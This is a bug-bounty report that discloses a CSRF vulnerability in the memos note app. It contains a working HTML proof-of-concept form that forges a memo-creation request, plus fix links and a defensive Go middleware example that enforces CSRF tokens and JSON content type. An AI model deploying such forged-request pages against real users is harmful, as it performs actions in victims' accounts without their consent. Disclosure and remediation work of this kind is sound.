huntr / Samirwaleed / 075DBD51-B078-436C-9E3D-7F25CD2E7E1B
Dec 28, 2022 - 9:57 p.m.

Add any thoughts via CSRF

2022-12-28 21:57:24
samirwaleed
www.huntr.dev
7
Tags: csrf, data manipulation, security vulnerability, proof of concept, csrf token

EPSS: 0.001 (Low), percentile 29.1%

Description

An attacker can add arbitrary thoughts to a victim's account via a CSRF attack.

When the attacker sends a link to the victim and the victim clicks on it, the attacker-chosen thought is added to the victim's account.

Proof of Concept

1- The attacker adds a thought in their own account and intercepts the request.

2- Use that request to generate a CSRF PoC:

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.usememos.com/api/memo" method="POST" enctype="text/plain">
      <input type="hidden" name='{"content":"Test CSRF","visibility":"PRIVATE","resourceIdList":[]}' value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

POC

https://drive.google.com/file/d/11Hec1H-61UpoOLVi55uWRpLBUMLVjRbi/view?usp=share_link

Some sources on fixing CSRF

Add a CSRF token:

https://www.freecodecamp.org/news/csrf-protection-problem-and-how-to-fix-it

https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html
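The OWASP cheat sheet linked above describes the synchronizer-token pattern. What follows is an added example, not code from the memos project or from this report: a hypothetical Go middleware (memos is written in Go) that refuses state-changing requests unless they carry a valid per-session token in an X-CSRF-Token header and a JSON content type. A cross-site HTML form can neither read the token nor set a custom header, and it can only submit urlencoded, multipart or text/plain bodies, so the content-type check alone already defeats the enctype="text/plain" form used in the PoC. The cookie name "session", the header name, the SessionStore and the session ID "sess-123" are assumptions made for the example.

```go
package main

import (
	"crypto/rand"
	"crypto/subtle"
	"encoding/hex"
	"fmt"
	"net/http"
	"net/http/httptest"
	"strings"
	"sync"
)

// SessionStore maps a session ID (the value of the auth cookie) to the CSRF
// token issued for that session. Hypothetical in-memory store for the example.
type SessionStore struct {
	mu     sync.Mutex
	tokens map[string]string
}

func NewSessionStore() *SessionStore {
	return &SessionStore{tokens: make(map[string]string)}
}

// IssueToken generates a fresh 256-bit random token and binds it to the session.
func (s *SessionStore) IssueToken(sessionID string) string {
	buf := make([]byte, 32)
	if _, err := rand.Read(buf); err != nil {
		panic(err) // a failing CSPRNG is unrecoverable for a token issuer
	}
	tok := hex.EncodeToString(buf)
	s.mu.Lock()
	s.tokens[sessionID] = tok
	s.mu.Unlock()
	return tok
}

func (s *SessionStore) lookup(sessionID string) (string, bool) {
	s.mu.Lock()
	defer s.mu.Unlock()
	tok, ok := s.tokens[sessionID]
	return tok, ok
}

// CSRFProtect wraps a state-changing JSON API handler such as POST /api/memo.
func CSRFProtect(store *SessionStore, next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		switch r.Method {
		case http.MethodGet, http.MethodHead, http.MethodOptions:
			next.ServeHTTP(w, r) // safe methods need no token
			return
		}
		// 1. A plain HTML form cannot send application/json, so requiring it
		//    rejects the enctype="text/plain" trick from the PoC above.
		ct := r.Header.Get("Content-Type")
		if !strings.HasPrefix(strings.ToLower(ct), "application/json") {
			http.Error(w, "expected application/json", http.StatusUnsupportedMediaType)
			return
		}
		// 2. The header token must match the token bound to the caller's session.
		cookie, err := r.Cookie("session") // assumed cookie name
		if err != nil {
			http.Error(w, "no session", http.StatusUnauthorized)
			return
		}
		want, ok := store.lookup(cookie.Value)
		got := r.Header.Get("X-CSRF-Token")
		if !ok || subtle.ConstantTimeCompare([]byte(want), []byte(got)) != 1 {
			http.Error(w, "invalid CSRF token", http.StatusForbidden)
			return
		}
		next.ServeHTTP(w, r)
	})
}

// Simulate sends one POST /api/memo through the middleware with the given
// content type and token and returns the resulting status code.
func Simulate(store *SessionStore, contentType, token string) int {
	h := CSRFProtect(store, http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		w.WriteHeader(http.StatusOK) // the real handler would create the memo here
	}))
	body := `{"content":"Test CSRF","visibility":"PRIVATE","resourceIdList":[]}` // constructed body
	req := httptest.NewRequest(http.MethodPost, "/api/memo", strings.NewReader(body))
	req.Header.Set("Content-Type", contentType)
	req.AddCookie(&http.Cookie{Name: "session", Value: "sess-123"}) // constructed session ID
	if token != "" {
		req.Header.Set("X-CSRF-Token", token)
	}
	rec := httptest.NewRecorder()
	h.ServeHTTP(rec, req)
	return rec.Code
}

func main() {
	store := NewSessionStore()
	tok := store.IssueToken("sess-123")
	fmt.Println("forged text/plain form:", Simulate(store, "text/plain", ""))          // 415
	fmt.Println("json, wrong token:     ", Simulate(store, "application/json", "nope")) // 403
	fmt.Println("json, valid token:     ", Simulate(store, "application/json", tok))    // 200
}
```

The legitimate front end fetches the token once after login and attaches it as a header to every mutating call; the forged form from the PoC never reaches the handler because it fails the content-type check, and even a cross-origin script that could send JSON would still be missing the token.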
